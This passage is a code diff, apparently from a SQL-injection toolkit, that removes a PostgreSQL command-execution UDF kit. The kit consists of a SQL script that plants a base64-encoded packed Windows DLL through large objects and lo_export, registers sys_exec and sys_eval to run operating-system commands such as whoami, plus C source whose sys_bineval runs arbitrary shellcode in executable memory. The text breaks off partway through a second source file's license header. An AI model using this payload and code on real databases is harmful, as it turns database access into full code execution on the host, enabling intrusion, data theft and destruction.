-UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAAAAAAAAAAAAAAAAAAAAAA';
-UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAAD5IYNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAgBAAABAQAACQEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
--- DLL compiled using PostgreSQL 8.2 C libraries
--- INSERT INTO udftest(data) VALUES ('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAD12MHTsbmvgLG5r4Cxua+AuME8gLO5r4C4wTqAsLmvgLjBLIC/ua+AuMErgLO5r4CWf9SAtLmvgLG5roCYua+AuMEmgLC5r4C4wT2AsLmvgLjBPoCwua+AUmljaLG5r4AAAAAAAAAAAFBFAABMAQMAUx6DSQAAAAAAAAAA4AACIQsBCQAAEAAAABAAAABgAAAgewAAAHAAAACAAAAAAAAQABAAAAACAAAFAAAAAAAAAAUAAAAAAAAAAJAAAAAQAAAAAAAAAgBAAQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAKyDAAC4AAAAtIIAAPgAAAAAgAAAtAIAAAAAAAAAAAAAAAAAAAAAAABkhAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7HwAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVVBYMAAAAAAAYAAAABAAAAAAAAAABAAAAAAAAAAAAAAAAAAAgAAA4FVQWDEAAAAAABAAAABwAAAADgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAucnNyYwAAAAAQAAAAgAAAAAYAAAASAAAAAAAAAAAAAAAAAABAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
--- UPDATE udftest SET data=data||'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4wMwBVUFghDQkCCXeP6gEDsfuvE1UAABwLAAAAIAAAJgAAXkB2Sf64AAAQ+MPMDxEM+9/+f1NVi2wkDItFEFZXUOgbAgKL2Iszgeb/AN1/938/g+4EjU4BUf8VQoxWjVMEi/hSVyMK/7GP/bBXxgQ3ABeEV4vwCJSDxBw7XRB0W/Zv3wlTRQgNBF+Lxl5dW2p/bfllLxDDEoHsCAShAu2zdf8gADPEiYQkBA2LBgxAEJ2F3d5kli2FgYs3nLIdefvVVoPHmNhXU2oBmTO3sdvu1WhlFFOaM/+ciCBTjdvYd+1UJDgWVlKJXCQ8FnylLLf///+FwHRbjUQkFI1QAesDjUkAighAhMl1+SvCMo0sfbeNtTt+KHhJUyQgUAP+V9iT7o8QgItMJCRRUiyL/VDY2fZyIHWvi2EQsFMXXzh8w5AOgD4AdAQ3FsZEN/+u/bK7AHCNZCRvg8AEULjggbnyucYsHKQAH/Ync+2JBxwZElCNRwRWUPjNF1w7i4ydiHYMi8dfM+7C4YfMNQ6BxF1u/yWF3/7hsagFpDsNbHUC88PpCAXLi/8QK2PuVmiAaOhw8f7/u7zHWVmjI1gEVIX2dQUzwEBew4MmAF3h6+5WB5loBMMJgnulBhuttbHVC1kjIk5Q7FfY/dtRUQo5RQx1DjkFaxB+bnMtNO7+EIN9DAGLCRBIiybYiWG3dd8KI0gPhdR9ZBcYBot5y7W72241ICiJ';
--- UPDATE udftest SET data=data||'PVC7HlDrGEoLD/bfpwSOO8d0F2joA6gsagDy/3fd9obWbOfrB8csATyhL0xqAm/37oZe0glqH5IJRus8qhDABHXte++4xwUfKBpA4CcH79/3nVyLILQEsBs6WYk1K/tztxs9WTmydQhpczA5PRXS3+69XHQcaAYoCHxDDf91PL7Y9rYDCCMW//FUiH+suRkB3AgBodt4BINl/ACZyM5m39sP1Pxjg7Ung/gCZtJZW//NsI19oFhLUDFZLjXmaN/hD4SHxxlUE0kU8e2luxgQiX2N7wQ7yHJRgz/b2j+2g/NqbDkHdOn/NyYg+BDabKExXLn4VhVxx+3NRBtHTfhVOU0Q27b2rQPQCHS0iQkCDBoIYGN20nbrp/YM/VlELttXiBE4WAZMMvwbjiALP1BDm1u/9Db8ycIMAGoQQxIo0Fv5i/KLXbK7vbkIHFTkM8lc/Il9IAhbi7Hw/DvxWjk6RBfk4c3/H6+EO/B0BYP+AnUuoew7wXSeFm64bVZf0Dte5AADkz24D2cR/mwUFoBWw7+TEglSJ/4BdSRkIFrEZoWzE1d3L1L+Gu010gYRU/dqA3VDYc92w080AyFodC4sLVx42CV/6xtx7IsXCXCpfLyq4FBRZEwQZei5Gg6t9i/60v67tcdv2xkFnSrkIb3DluyvcJrUFv87JGobd7cKjvZUfUhVDA0EklnKBWKGXTgiMygDbt5MG18hIEMFHIkVGIkd+25ubhSJNRCJPQxmjBg4BmZplmYNLB0IBe9uaZYEJQAtf/ycjxT5s421MJVWJAcEKI1FCLMx1v40i4Xg/KCqcJUBbR3btRwZICQTGAllwLm7ZowJHLNgiYXYMr4xzPIKBNwDFDRodMZfBaa0jFlq9xjWvs/geUYcgz0gAPkjrEDsHWhbG34G8cJ7eiTJw4BAHhTDahQLKSnySlAVqvj8/pMeopwQZFnrZ2oIN6RZQ3LDOI/tJzXDrdC6WTTg9b8D5FB/bSNgvkt0Zp4c3CpbjK0ULNbiCeDlJbRXG9I6';
--- UPDATE udftest SET data=data||'2wd53IRnk9xsmFnZTttt/u8WBt332BvA99hZSF1WuLwYvgQaHX/pV1A7xnMPiwdTAlA5rPQO1jv+cvEwJSALEinkIE9pDd6+ETUIuE1aLmY5AXP/8u9KWGhBPAPBgThQRXXvM9K5CwEbdoN/HEgYD5Tnwl07PyW+NS3dSDHID7dBRaVLbLdWBXEGM1cACBgR/98ajXbkoBwMO/lyCYtYCAPZO/sztd/gcgpCnCg71nLoat9ONh8O2U9q/qNwaNVkGOYbOBICUIPsCCnpu+HWMWYzxXDwZKMaiTAMFj5DTAloT/BwfV1nYuwS71WXLRNQt2iWhxkILAg7KyTBFYJw4egf9w/gAYkD1HbbqU8dAFmUi+WWKdaxnZ0Byj2pwPqdYmUt2C+7MUZGxk43PAVAREzG8uOSqRKwEOwJZbN2ch0Qyar776UWBh5a/T6UM5dttmwDjSvg+vzxQLAGmjyu/IrZwCbBdw3DlZYzHBzGUU4Ued6xfOh2aQISBCAUCqoYka3Y71yj7BBogvg7aA7+U1e/TuZAu35mfA2F6KdCicMrNZQE62C2xKRW43hjEXWYxhaKtZILl/AHNNHMlUEInSe++1vbOPQzDBE793UHvk9Z6wuF83XsEfgup8HgEAvwyAD31gfGRih9BF5fW7o/mAWcRkZGRlhcYGgAAGRHVAAA1CgV8gIhAI10Z9l9pRQRIgNkA0Bl0AzSAXJIXf///RJREhBLUlNEUwG3/T9I581Otf//N//blFHkL74MDGM6XERvY3VtZW50cyBhbmQgU2X//9v/dHRpbmdzXEFkbQdpc3RyYXRvci5XMkszU1RFTv63t/ZVUERBBjNlc2sWcFxzaGFyZVx2/O3/3yZ1YWxfY3BwX3Byb2plY3Q+bGliX3Bv/f//tmcfc3FsdWRmX3N5c184MlxSZWxlYXNlIMd+gSAucGRi0dUZbPK9WHcH0A91g3WVq6EHbQOBAzslhyfMB30PJNGdsNgfCQsDH9AogwAAAn0DpaLtsRm/RP+q';
--- UPDATE udftest SET data=data||'iiSCAIAAAGAw/woqwEIU//+XZ3gQAUdldEN1cnJlbnRQcm9jZXNzvf//yElkU3lzdGVtVGltZUFzRmlsZQn+1n6LGAhja0NvdS8NUXVlcnlQrcXa3wNmb3JtYW48Fg4Y3/6t+0Rpc2FiM2hXYWRMaWJyYSdDYWxsXCv/t3NvSXNEZWJ1Z2dlcm127W172VRTVW5oQGQxZEV4Rq2wmPtwdGlvbnNKGQTQtpS5ElQXtm+ytkRhHhFJkGwMa8257dZAnW1wh2VHUX9Zwlpzd1VRIhtCYbZsXMQVM6y7Pc2FPF9jaXQ0bQrXtu8GXzRfYW1zZwh4EQvtd7/wZGp1Ql9mZGl2DV9DcHBYY78JoP1hvF9kZWNvA5HctjBhaTJdbR55GGxr7xVCizL1CW5NESYLFhMPZQ2+dvuEXxtyNF9MbW0cGG5bs2v/V2RfbnU9RG1hYx5ye25hYzRuc9gdCMZuhm1m8nQsrnJuhHPN3O0d/N0qcGVVRV5zhfYPYwe0MDrvsdsE51bIzotvb7aGoX1rIlZuX3R5ORwaFlsotIkVil9yCp49zcJsRpGkcEVwZwFccO9DdG9hc0u6dW3///9nVhAzGAksFiMtCxcpERcRB4YGBhcJBwUWDB5/+///CAoLFgkYGBUFBhsFDBAGBxcGIQURDwYUIRELCCff/7crIgUHDREdDRhTLUg4BgAHCLJt3y4MCTMKCQsMWwUWFu7f/u0OCzQVCxgWDT0FQrwFEh4UBmky2d7N/xEMDh1NBRcjDQwkCAtEAvBvKvh/NARgBOgIBBwcBAAyTAEFAC3/YfVTHoNJNOAAAiELAQkMCJj9JlsArBULbOa+9xoJCwLeHgf3uzTfA2AEc4IeQAEqbM+WvQIHBnAmB7hmtm/ZjCJQFEBPsACrZntTUJ930BzVtyx2IBghQgAvbPMDSbAudGV4dLoKkMNDNhsMt0JgLnLLLWGQW2H7KAcIE7rvNYcCQC4m/gOUMLhN2WkCJ8BPc3Jg3wvWgOuwcxpPzc3RCFKp';
--- UPDATE udftest SET data=data||'T4wBUPtNySAeQhuMIxIAAHxyoVJTAAASAAAA/wAAAACAfCQIAQ+FuQEAAGC+AHAAEI2+AKD//1eDzf/rDZCQkIoGRogHRwHbdQeLHoPu/BHbcu24AQAAAAHbdQeLHoPu/BHbEcAB23PvdQmLHoPu/BHbc+QxyYPoA3INweAIigZGg/D/dHSJxQHbdQeLHoPu/BHbEckB23UHix6D7vwR2xHJdSBBAdt1B4seg+78EdsRyQHbc+91CYseg+78Edtz5IPBAoH9APP//4PRAY0UL4P9/HYPigJCiAdHSXX36WP///+QiwKDwgSJB4PHBIPpBHfxAc/pTP///16J97ktAAAAigdHLOg8AXf3gD8AdfKLB4pfBGbB6AjBwBCGxCn4gOvoAfCJB4PHBYjY4tmNvgBQAACLBwnAdDyLXwSNhDC0cgAAAfNQg8cI/5YEcwAAlYoHRwjAdNyJ+VdI8q5V/5YIcwAACcB0B4kDg8ME6+FhMcDCDACDxwSNXvwxwIoHRwnAdCI873cRAcOLA4bEwcAQhsQB8IkD6+IkD8HgEGaLB4PHAuvii64McwAAjb4A8P//uwAQAABQVGoEU1f/1Y2HBwIAAIAgf4BgKH9YUFRQU1f/1VhhjUQkgGoAOcR1+oPsgOnDmP//AAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAEBAiABABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAAAAAAAEAAAAAAABABgAAAAYAACAAAAAAAAAAAAEAAAAAAABAAIAAAAwAACAAAAAAAAAAAAEAAAAAAABAAkEAABIAAAAXIAAAFYCAADkBAAAAAAAAFhAAAA8YXNzZW1ibHkgeG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYxIiBtYW5pZmVzdFZlcnNpb249IjEuMCI+DQogIDx0cnVzdEluZm8geG1sbnM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206YXNtLnYzIj4NCiAgICA8c2VjdXJpdHk+DQogICAgICA8cmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICAgICAgPHJlcXVlc3RlZEV4ZWN1dGlvbkxldmVsIGxldmVsPSJhc0ludm9rZXIiIHVpQWNjZXNzPSJmYWxzZSI+PC9yZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbD4NCiAgICAgIDwvcmVxdWVzdGVkUHJpdmlsZWdlcz4NCiAgICA8L3NlY3VyaXR5Pg0KICA8L3RydXN0SW5mbz4NCiAgPGRlcGVuZGVuY3k+DQogICAgPGRlcGVuZGVudEFzc2VtYmx5Pg0KICAgICAgPGFzc2VtYmx5SWRlbnRpdHkgdHlwZT0id2luMzIiIG5hbWU9Ik1pY3Jvc29mdC5WQzkwLkNSVCIgdmVyc2lvbj0iOS4wLjIxMDIyLjgiIHByb2Nlc3NvckFyY2hpdGVjdHVyZT0ieDg2IiBwdWJsaWNLZXlUb2tlbj0iMWZjOGIzYjlhMWUxOGUzYiI+PC9hc3NlbWJseUlkZW50aXR5Pg0KICAgIDwvZGVwZW5kZW50QXNzZW1ibHk+DQogIDwvZGVwZW5kZW5jeT4NCjwvYXNzZW1ibHk+UEEAAAAAAAAAAAAAAAAsgwAABIMAAAAAAAAAAAAAAAAAADmDAAAcgwAAAAAAAAAAAAAAAAAARYMAACSDAAAAAAAAAAAAAAAAAAAAAAAA';
--- UPDATE udftest SET data=data||'AAAAAFKDAABggwAAcIMAAICDAACOgwAAAAAAAJyDAAAAAAAAooMAAAAAAABLRVJORUwzMi5ETEwATVNWQ1I5MC5kbGwAcG9zdGdyZXMuZXhlAAAATG9hZExpYnJhcnlBAABHZXRQcm9jQWRkcmVzcwAAVmlydHVhbFByb3RlY3QAAFZpcnR1YWxBbGxvYwAAVmlydHVhbEZyZWUAAABmcmVlAABwZnJlZQAAAAAAAABTHoNJAAAAAAaEAAABAAAABQAAAAUAAADUgwAA6IMAAPyDAAAAEAAAkBAAABAQAACgEAAAIBAAACCEAAAuhAAAQIQAAFKEAABbhAAAAAABAAIAAwAEAGxpYl9wb3N0Z3Jlc3FsdWRmX3N5cy5kbGwAUGdfbWFnaWNfZnVuYwBwZ19maW5mb19zeXNfZXZhbABwZ19maW5mb19zeXNfZXhlYwBzeXNfZXZhbABzeXNfZXhlYwAAcAAAEAAAAC07KD0sPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
-
-
--- Create a new OID for a large object, it implicitly adds an entry in the
--- PostgreSQL large objects system table
--- 
--- References:
--- http://www.postgresql.org/docs/8.3/interactive/largeobjects.html
--- http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html
-SELECT lo_unlink(35817);
-SELECT lo_create(35817);
-
-
--- Update the PostgreSQL system large objects table assigning to the just
--- created OID the binary (base64 decoded) UDF as data
--- 
--- Refereces:
--- http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql
-UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM udftest), 'base64')) WHERE loid=35817;
-
-
--- Export the binary UDF OID to a file on the file system
--- 
--- Any folder where postgres user has read/write/execute access is valid
--- SELECT lo_export(35817, E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll');
--- 
--- Notes:
--- If the library file already exists, the user postgres does not have
--- access to overwrite it
--- The following enumerates the PostgreSQL data directory
--- SELECT CURRENT_SETTING('data_directory')
--- Reference:
--- http://www.postgresql.org/docs/8.3/interactive/functions-admin.html
--- The following will save into C:\Program Files\PostgreSQL\8.3\data
-SELECT lo_export(35817, 'lib_postgresqludf_sys.dll'); -- Favourite one, no need to enumerate the PostgreSQL data directory before
--- The following will save into nowhere
--- SELECT lo_export(35817, E'\lib_postgresqludf_sys.dll');
--- The following would save into C:\ (Permission denied)
--- SELECT lo_export(35817, E'\\lib_postgresqludf_sys.dll');
-
-
--- Create two functions from the binary UDF file
--- CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
--- CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS E'C:\\Documents and Settings\\postgres\\lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-
-
--- Test the two functions
-SELECT sys_exec('echo test > %TEMP%/lib_postgresqludf_sys.txt'); -- %TEMP% path is C:\Documents and Settings\postgres\Local Settings\Temp
-SELECT sys_eval('echo %TEMP% && whoami');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('del %TEMP%\\lib_postgresqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
-DROP FUNCTION IF EXISTS sys_exec(text);
-DROP FUNCTION IF EXISTS sys_eval(text);

extra/postgresqludfsys/lib_postgresqludf_sys/linux/Makefile

@@ -1,11 +0,0 @@
-LIBDIR=/tmp
-
-8.2:
-	gcc -Wall -I/usr/include/postgresql/8.2/server -O1 -shared src/8.2/lib_postgresqludf_sys.c -o so/8.2/lib_postgresqludf_sys.so
-	strip -sx so/8.2/lib_postgresqludf_sys.so
-	cp -f so/8.2/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
-
-8.3:
-	gcc -Wall -I/usr/include/postgresql/8.3/server -O1 -shared src/8.3/lib_postgresqludf_sys.c -o so/8.3/lib_postgresqludf_sys.so
-	strip -sx so/8.3/lib_postgresqludf_sys.so
-	cp -f so/8.3/lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/postgresqludfsys/lib_postgresqludf_sys/linux/src/8.2/lib_postgresqludf_sys.c

@@ -1,192 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
-	You should have received a copy of the GNU Lesser General Public
-	License along with this library; if not, write to the Free Software
-	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
-*/
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#define _USE_32BIT_TIME_T
-#define DLLEXP __declspec(dllexport) 
-#define BUILDING_DLL 1
-#else
-#define DLLEXP
-#include <sys/mman.h>
-#include <sys/types.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-#include <postgres.h>
-#include <fmgr.h>
-#include <stdlib.h>
-#include <string.h>
-
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#endif
-
-#ifdef PG_MODULE_MAGIC
-PG_MODULE_MAGIC;
-#endif
-
-PG_FUNCTION_INFO_V1(sys_exec);
-extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	int32 result = 0;
-	char *command;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command execution: %s", command);
-	*/
-
-	result = system(command);
-	free(command);
-
-	PG_FREE_IF_COPY(argv0, 0);
-	PG_RETURN_INT32(result);
-}
-
-PG_FUNCTION_INFO_V1(sys_eval);
-extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	text *result_text;
-	int32 argv0_size;
-	char *command;
-	char *result;
-	FILE *pipe;
-	char line[1024];
-	int32 outlen, linelen;
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	command = (char *)malloc(argv0_size + 1);
-
-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif

extra/postgresqludfsys/lib_postgresqludf_sys/windows/src/8.2/lib_postgresqludf_sys.c

@@ -1,192 +0,0 @@
-/* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
-	
-	This library is free software; you can redistribute it and/or
-	modify it under the terms of the GNU Lesser General Public
-	License as published by the Free Software Foundation; either
-	version 2.1 of the License, or (at your option) any later version.
-	
-	This library is distributed in the hope that it will be useful,
-	but WITHOUT ANY WARRANTY; without even the implied warranty of
-	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-	Lesser General Public License for more details.
-	
